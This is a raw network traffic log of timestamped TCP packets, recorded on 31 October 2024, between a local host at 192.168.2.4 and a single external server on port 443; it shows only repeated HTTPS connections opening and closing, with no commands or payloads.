                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.648139000 CET4435146313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.648179054 CET51463443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.648179054 CET51463443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.648478031 CET51463443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.648478031 CET51463443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.648504019 CET4435146313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.648516893 CET4435146313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.651674032 CET51467443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.651717901 CET4435146713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.651789904 CET51467443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.652334929 CET51468443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.652344942 CET4435146813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.652389050 CET51468443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.652466059 CET51467443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.652483940 CET4435146713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.652568102 CET51468443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.652579069 CET4435146813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.811578989 CET4435146413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.811655998 CET4435146413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.811798096 CET51464443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.812088013 CET51464443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.812129021 CET4435146413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.812150002 CET51464443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.812155962 CET4435146413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.813873053 CET4435146613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.814364910 CET51466443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.814376116 CET4435146613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.814738035 CET51466443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.814743996 CET4435146613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.815438032 CET51469443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.815481901 CET4435146913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.815557957 CET51469443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.815830946 CET51469443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.815846920 CET4435146913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.832194090 CET4435146513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.832566023 CET51465443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.832575083 CET4435146513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.832987070 CET51465443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.832992077 CET4435146513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.960648060 CET4435146613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.960725069 CET4435146613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.960798025 CET51466443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.961055994 CET51466443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.961074114 CET4435146613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.961085081 CET51466443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.961091042 CET4435146613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.964477062 CET51470443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.964488983 CET4435147013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.964600086 CET51470443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.964778900 CET51470443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.964790106 CET4435147013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.968061924 CET4435146513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.968105078 CET4435146513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.968148947 CET51465443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.968158960 CET4435146513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.968177080 CET4435146513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.968219995 CET51465443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.968379974 CET51465443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.968388081 CET4435146513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.968391895 CET51465443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.968396902 CET4435146513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.970578909 CET51471443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.970623970 CET4435147113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.970696926 CET51471443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.970839977 CET51471443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:42.970855951 CET4435147113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.422933102 CET4435146813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.423557043 CET51468443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.423582077 CET4435146813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.424053907 CET51468443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.424060106 CET4435146813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.426688910 CET4435146713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.427196026 CET51467443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.427221060 CET4435146713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.428138018 CET51467443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.428143978 CET4435146713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.552913904 CET4435146813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.553107977 CET4435146813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.553178072 CET51468443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.553385973 CET51468443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.553385973 CET51468443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.553400040 CET4435146813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.553409100 CET4435146813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.556576967 CET51472443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.556611061 CET4435147213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.556700945 CET51472443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.556883097 CET51472443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.556891918 CET4435147213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.573132038 CET4435146713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.573199987 CET4435146713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.573344946 CET51467443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.573493004 CET51467443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.573506117 CET4435146713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.573518038 CET51467443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.573523998 CET4435146713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.576222897 CET51473443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.576275110 CET4435147313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.576365948 CET51473443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.576514959 CET51473443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.576528072 CET4435147313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.602042913 CET4435146913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.602643013 CET51469443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.602660894 CET4435146913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.603153944 CET51469443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.603158951 CET4435146913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.691356897 CET4435147013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.691973925 CET51470443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.691989899 CET4435147013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.692507029 CET51470443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.692511082 CET4435147013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.739737988 CET4435147113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.740217924 CET51471443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.740226984 CET4435147113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.740701914 CET51471443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.740705967 CET4435147113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.758941889 CET4435146913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.760036945 CET4435146913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.760088921 CET4435146913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.760094881 CET51469443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.760138988 CET51469443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.760178089 CET51469443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.760188103 CET4435146913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.760200024 CET51469443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.760205030 CET4435146913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.763113976 CET51474443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.763134003 CET4435147413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.763206005 CET51474443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.763350964 CET51474443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.763364077 CET4435147413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.819088936 CET4435147013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.819158077 CET4435147013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.819216013 CET51470443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.829123974 CET51470443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.829139948 CET4435147013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.829152107 CET51470443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.829155922 CET4435147013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.833420992 CET51475443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.833466053 CET4435147513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.833520889 CET51475443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.852986097 CET51475443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.853029966 CET4435147513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.870675087 CET4435147113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.870764971 CET4435147113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.870812893 CET4435147113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.870812893 CET51471443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.870861053 CET51471443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.871062994 CET51471443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.871071100 CET4435147113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.871083021 CET51471443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.871087074 CET4435147113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.873852015 CET51476443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.873866081 CET4435147613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.873939991 CET51476443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.874079943 CET51476443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:43.874090910 CET4435147613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.276484966 CET4435147213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.277216911 CET51472443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.277246952 CET4435147213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.277728081 CET51472443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.277734041 CET4435147213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.293840885 CET4435147313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.294477940 CET51473443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.294507027 CET4435147313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.294898987 CET51473443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.294905901 CET4435147313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.409163952 CET4435147213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.409487963 CET4435147213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.409539938 CET51472443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.410245895 CET51472443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.410269022 CET51472443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.410271883 CET4435147213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.410274982 CET4435147213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.415508032 CET51477443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.415554047 CET4435147713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.415632010 CET51477443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.415966034 CET51477443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.415978909 CET4435147713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.420308113 CET4435147313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.420334101 CET4435147313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.420384884 CET4435147313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.420387983 CET51473443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.420428991 CET51473443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.420636892 CET51473443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.420656919 CET4435147313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.420667887 CET51473443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.420674086 CET4435147313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.423962116 CET51478443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.423990965 CET4435147813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.424056053 CET51478443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.424324989 CET51478443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.424336910 CET4435147813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.609498978 CET4435147613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.610084057 CET51476443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.610105038 CET4435147613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.610635996 CET51476443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.610641956 CET4435147613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.619210958 CET4435147513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.619724035 CET51475443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.619750977 CET4435147513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.620199919 CET51475443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.620207071 CET4435147513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.743613958 CET4435147613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.743714094 CET4435147613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.743796110 CET51476443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.743978024 CET51476443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.744002104 CET4435147613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.744019032 CET51476443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.744024992 CET4435147613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.747230053 CET51479443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.747282028 CET4435147913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.747384071 CET51479443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.747517109 CET51479443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.747530937 CET4435147913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.750222921 CET4435147513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.750289917 CET4435147513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.750339031 CET51475443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.750471115 CET51475443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.750487089 CET4435147513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.750498056 CET51475443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.750504017 CET4435147513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.752676010 CET51480443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.752686977 CET4435148013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.752747059 CET51480443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.752866030 CET51480443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:44.752880096 CET4435148013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.435566902 CET4435147813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.436249971 CET51478443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.436288118 CET4435147813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.436796904 CET51478443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.436801910 CET4435147813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.442733049 CET4435147713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.443125010 CET51477443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.443137884 CET4435147713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.443613052 CET51477443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.443618059 CET4435147713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.497680902 CET4435148013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.498276949 CET51480443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.498313904 CET4435148013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.498723030 CET51480443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.498730898 CET4435148013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.500576973 CET4435147913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.500824928 CET51479443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.500845909 CET4435147913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.501163006 CET51479443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.501168966 CET4435147913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.564363956 CET4435147413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.564909935 CET51474443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.564920902 CET4435147413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.565517902 CET51474443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.565521955 CET4435147413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:45.569679022 CET4435147813.107.246.45192.168.2.4
